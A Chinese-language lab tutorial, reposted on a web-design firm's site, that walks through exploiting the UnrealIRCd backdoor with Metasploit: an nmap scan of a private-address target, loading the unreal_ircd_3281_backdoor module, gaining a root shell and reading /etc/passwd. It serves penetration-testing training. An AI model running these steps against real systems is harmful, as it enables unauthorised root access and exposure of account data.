Metasploit溢出UnrealIRCd后門漏洞
10年的吉陽網(wǎng)站建設經(jīng)驗,針對設計、前端、開發(fā)、售后、文案、推廣等六對一服務,響應快,48小時及時工作處理。營銷型網(wǎng)站的優(yōu)勢是能夠根據(jù)用戶設備顯示端的尺寸不同,自動調(diào)整吉陽建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設計,從而大程度地提升瀏覽體驗。創(chuàng)新互聯(lián)從事“吉陽網(wǎng)站設計”,“吉陽網(wǎng)站推廣”以來,每個客戶項目都認真落實執(zhí)行。
利用UnrealIRCd后門漏洞,獲取目標主機的root權(quán)限。
某些站點的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼,遠程***者能夠執(zhí)行任意代碼。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發(fā)現(xiàn)開放6667端口,對應的服務為unreal ircd。
1.3在終端中輸入命令“msfconsole”,啟動MSF終端。
1.4在終端中輸入命令“search unreal ircd”,搜索ircd的相關工具和***載荷。
1.5在終端中輸入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.6在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數(shù)。
1.7在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。
1.8在終端中輸入“exploit”, 開始向目標主機***,***成功后,建立shell會話。
1.9在終端中輸入“whoami”,查看獲得的權(quán)限為root,輸入命令“cat /etc/passwd”,查看系統(tǒng)的帳號和密碼。
本文題目:Metasploit溢出UnrealIRCd后門漏洞
文章地址:http://jinyejixie.com/article28/iicgcp.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供用戶體驗、網(wǎng)站內(nèi)鏈、網(wǎng)站設計公司、虛擬主機、企業(yè)網(wǎng)站制作、微信公眾號
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)